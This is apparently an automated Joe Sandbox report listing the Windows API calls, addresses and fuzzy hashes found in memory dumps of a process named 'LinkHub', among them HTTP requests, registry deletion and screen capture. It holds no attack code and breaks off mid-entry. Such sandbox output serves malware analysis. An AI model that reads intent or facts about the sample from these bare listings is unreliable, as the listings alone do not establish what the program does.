                                                                    • SysFreeString.OLEAUT32(?), ref: 00CF4D4F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 354098117-199464113
                                                                    • Opcode ID: 9c8f981428e3c8c8f631b48da67656abcae679eec188eeb4108bd228ba1dd1a8
                                                                    • Instruction ID: fd2019266930a2bdc5f00396fe57843de55920fa2150581655e856e5a599d605
                                                                    • Opcode Fuzzy Hash: 9c8f981428e3c8c8f631b48da67656abcae679eec188eeb4108bd228ba1dd1a8
                                                                    • Instruction Fuzzy Hash: 85122C71A00209EFDB58DF94C884EBAB7B5FF45314F248098FA199B251D731EE46CBA1
                                                                    APIs
                                                                    • GetMenuItemCount.USER32(00D429C0), ref: 00CB3F72
                                                                    • GetMenuItemCount.USER32(00D429C0), ref: 00CB4022
                                                                    • GetCursorPos.USER32(?), ref: 00CB4066
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00CB406F
                                                                    • TrackPopupMenuEx.USER32(00D429C0,00000000,?,00000000,00000000,00000000), ref: 00CB4082
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CB408E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                    • String ID: 0
                                                                    • API String ID: 36266755-4108050209
                                                                    • Opcode ID: 770fd27295b019241f7ca5a2eda9c3a6f1b8acae159cdf975426979c083ddb0f
                                                                    • Instruction ID: 171616dd1adf774bff9fb4c98b901de938fdc04cbbb475e1ddf00e063aa125af
                                                                    • Opcode Fuzzy Hash: 770fd27295b019241f7ca5a2eda9c3a6f1b8acae159cdf975426979c083ddb0f
                                                                    • Instruction Fuzzy Hash: 22711670A44245BFEB219FA9DC89FEABF65FF05324F104206F628A62D1C7B19A10D751
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,?), ref: 00D07823
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00D07897
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D078B9
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D078CC
                                                                    • DestroyWindow.USER32(?), ref: 00D078ED
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C70000,00000000), ref: 00D0791C
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D07935
                                                                    • GetDesktopWindow.USER32 ref: 00D0794E
                                                                    • GetWindowRect.USER32(00000000), ref: 00D07955
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D0796D
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D07985
                                                                      • Part of subcall function 00C72234: GetWindowLongW.USER32(?,000000EB), ref: 00C72242
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 2429346358-3619404913
                                                                    • Opcode ID: 70a2e75a595a35cb94c87ca12008ca14e4375cd519be7ba30328371e2fa6fa57
                                                                    • Instruction ID: c29a315805e2ff831b10ea7546d05c9ead222fa57ea092898ece9e93cbae98de
                                                                    • Opcode Fuzzy Hash: 70a2e75a595a35cb94c87ca12008ca14e4375cd519be7ba30328371e2fa6fa57
                                                                    • Instruction Fuzzy Hash: A4716870944344AFD725CF58DC48BAABBE9EB89304F48441EF9898B2A1C771A906DF31
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00D09BA3
                                                                      • Part of subcall function 00D080AE: ClientToScreen.USER32(?,?), ref: 00D080D4
                                                                      • Part of subcall function 00D080AE: GetWindowRect.USER32(?,?), ref: 00D0814A
                                                                      • Part of subcall function 00D080AE: PtInRect.USER32(?,?,?), ref: 00D0815A
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00D09C0C
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D09C17
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D09C3A
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D09C81
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00D09C9A
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00D09CB1
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00D09CD3
                                                                    • DragFinish.SHELL32(?), ref: 00D09CDA
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00D09DCD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 221274066-3440237614
                                                                    • Opcode ID: 902df73a02f7066a7c0223fec9f57b20a639bf871f3637b0b68e9e0878683b10
                                                                    • Instruction ID: 30ddd9e0ce3cdf195796fe9169fb8005f5ec7b2f56ea0bb9557a56194b402461
                                                                    • Opcode Fuzzy Hash: 902df73a02f7066a7c0223fec9f57b20a639bf871f3637b0b68e9e0878683b10
                                                                    • Instruction Fuzzy Hash: 00617971508301AFC301EF64DC85EAFBBE9FF88750F40491EF599922A1DB309A49DB62
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CECEF5
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CECF08
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CECF1C
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CECF35
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00CECF78
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CECF8E
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CECF99
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CECFC9
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CED021
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CED035
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00CED040
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                    • String ID:
                                                                    • API String ID: 3800310941-3916222277
                                                                    • Opcode ID: 16768ed072f6c7ee9a1c0dca9c5591600b1e7d3f4ef4e3dfb9b662ab98df186d
                                                                    • Instruction ID: 6651fda8a08bb5d9eb50b7a7f1978c88715141d73ff64f85e718da3c4bca01f9
                                                                    • Opcode Fuzzy Hash: 16768ed072f6c7ee9a1c0dca9c5591600b1e7d3f4ef4e3dfb9b662ab98df186d
                                                                    • Instruction Fuzzy Hash: B5515CB1500748BFDB219FA2CC88BAB7BBDFF48744F04441AF95AD6250D734DA46AB60
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00D066D6,?,?), ref: 00D08FEE
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D08FFE
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09009
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09016
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00D09024
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09033
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00D0903C
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09043
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09054
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D10C04,?), ref: 00D0906D
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00D0907D
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00D0909D
                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00D090CD
                                                                    • DeleteObject.GDI32(00000000), ref: 00D090F5
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00D0910B
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: f4aaada51ff47ba29949aaa08d466fa6b00a6cde34914d4c9b998cbe529ca41a
                                                                    • Instruction ID: f896ece240c6cfd4f177014fabda7570361f22aa5b588208d6cc93097c70616b
                                                                    • Opcode Fuzzy Hash: f4aaada51ff47ba29949aaa08d466fa6b00a6cde34914d4c9b998cbe529ca41a
                                                                    • Instruction Fuzzy Hash: 78412775600308BFDB119FA5DC88FAABBB9EF89711F148059F909D72A1DB709941CB30
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CFD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CFC10E,?,?), ref: 00CFD415
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD451
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4C8
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFC154
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CFC1D2
                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00CFC26A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CFC2DE
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CFC2FC
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00CFC352
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CFC364
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CFC382
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00CFC3E3
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFC3F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 146587525-4033151799
                                                                    • Opcode ID: b1b951e7cc5d6f09c9104df1b9b1aad6ba0fb02627e9f8a4bbffe67af39ec9a0
                                                                    • Instruction ID: 1f64b495f042861010c817f46a70fb2776eafac5a616b948e9deff75f1b58319
                                                                    • Opcode Fuzzy Hash: b1b951e7cc5d6f09c9104df1b9b1aad6ba0fb02627e9f8a4bbffe67af39ec9a0
                                                                    • Instruction Fuzzy Hash: B1C17B35204209AFD754DF64C5C4B6ABBE1BF84308F14C59CF56A8B2A2CB31ED46CB92
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00CF3035
                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00CF3045
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00CF3051
                                                                    • SelectObject.GDI32(00000000,?), ref: 00CF305E
                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00CF30CA
                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00CF3109
                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00CF312D
                                                                    • SelectObject.GDI32(?,?), ref: 00CF3135
                                                                    • DeleteObject.GDI32(?), ref: 00CF313E
                                                                    • DeleteDC.GDI32(?), ref: 00CF3145
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00CF3150
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 6683d4e8cef7a9f9c414295f39a25a4c33623098bf55dffdc4e6347ba9197cbd
                                                                    • Instruction ID: 63ff0ef48aa933b34f91ff647fa5c920cf2d8083214071f3ded9a8631e1d7cf1
                                                                    • Opcode Fuzzy Hash: 6683d4e8cef7a9f9c414295f39a25a4c33623098bf55dffdc4e6347ba9197cbd
                                                                    • Instruction Fuzzy Hash: 9061C275D00219AFCF14CFE4D884AAEBBB6FF48310F20851AE559A7350D771AA51DFA0
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00D0A990
                                                                    • GetSystemMetrics.USER32(00000011), ref: 00D0A9A7
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00D0A9B3
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00D0A9C9
                                                                    • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00D0AC15
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D0AC33
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D0AC54
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00D0AC73
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00D0AC95
                                                                    • DefDlgProcW.USER32(?,00000005,?), ref: 00D0ACBB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                    • String ID: @
                                                                    • API String ID: 3962739598-2766056989
                                                                    • Opcode ID: 9c7f77ad0f34bc93c5bbf93ecf907c70d3434f9e194ad82182124b3ae2d10ea1
                                                                    • Instruction ID: 72c817e2f2c9dfc70c54ddf69263cd2e66413719eea9d8048a947c44f718f04a
                                                                    • Opcode Fuzzy Hash: 9c7f77ad0f34bc93c5bbf93ecf907c70d3434f9e194ad82182124b3ae2d10ea1
                                                                    • Instruction Fuzzy Hash: 14B17935600319EFDF14CF6DC984BAE7BB2BF44704F198069EC49AB295D770A980CB61
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00CD52E6
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00CD5328
                                                                    • _wcslen.LIBCMT ref: 00CD5339
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00CD5345
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00CD537A
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00CD53B2
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00CD53EB
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00CD5445
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00CD5477
                                                                    • GetWindowRect.USER32(?,?), ref: 00CD54EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                    • String ID: ThumbnailClass
                                                                    • API String ID: 1311036022-1241985126
                                                                    • Opcode ID: de00546ed024638e0b27099ccda48d2b0cfb62956bcc98d48724ca3df6ee74ba
                                                                    • Instruction ID: b35a55a0d36bffdc571f02ce48fc2c1faf2dfa2a55ea49dec19c0ed1a1e84214
                                                                    • Opcode Fuzzy Hash: de00546ed024638e0b27099ccda48d2b0cfb62956bcc98d48724ca3df6ee74ba
                                                                    • Instruction Fuzzy Hash: 7E91F971104B07AFD705DF24D994BAAB7A9FF00304F50451BFBAA82291EB31EE55CB91
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D097B6
                                                                    • GetFocus.USER32 ref: 00D097C6
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00D097D1
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00D09879
                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00D0992B
                                                                    • GetMenuItemCount.USER32(?), ref: 00D09948
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00D09958
                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00D0998A
                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00D099CC
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D099FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                    • String ID: 0
                                                                    • API String ID: 1026556194-4108050209
                                                                    • Opcode ID: 634a92d885973a6f876aa302b83a7788691333b2b38d4800dbd6a4a8a1114ee3
                                                                    • Instruction ID: 75bc1cc8be95add79a9033834700f76e587db990fb14bb0e13aca27bbef46eed
                                                                    • Opcode Fuzzy Hash: 634a92d885973a6f876aa302b83a7788691333b2b38d4800dbd6a4a8a1114ee3
                                                                    • Instruction Fuzzy Hash: 0981AC715083019FDB10CF24D894BABBBE9FB89314F08491EF98997292DB70D905CBB2
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(00D429C0,000000FF,00000000,00000030), ref: 00CDC973
                                                                    • SetMenuItemInfoW.USER32(00D429C0,00000004,00000000,00000030), ref: 00CDC9A8
                                                                    • Sleep.KERNEL32(000001F4), ref: 00CDC9BA
                                                                    • GetMenuItemCount.USER32(?), ref: 00CDCA00
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00CDCA1D
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00CDCA49
                                                                    • GetMenuItemID.USER32(?,?), ref: 00CDCA90
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CDCAD6
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CDCAEB
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CDCB0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                    • String ID: 0
                                                                    • API String ID: 1460738036-4108050209
                                                                    • Opcode ID: ded3cffbf6e11faa0ced7f9cf16dc030b4b7058ee36992bafe4ade4fae784717
                                                                    • Instruction ID: a403864201f8a22eff8b960be1d716706d7e54bfb8413ae46f38067fe6aab1bd
                                                                    • Opcode Fuzzy Hash: ded3cffbf6e11faa0ced7f9cf16dc030b4b7058ee36992bafe4ade4fae784717
                                                                    • Instruction Fuzzy Hash: D1616D7090024AABDF21CFA4DC89AAE7BB9FB05344F04005BFA65A3391D734AE11DB71
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00CDE4D4
                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00CDE4FA
                                                                    • _wcslen.LIBCMT ref: 00CDE504
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00CDE554
                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CDE570
                                                                    Strings
                                                                    Memory Dump Source
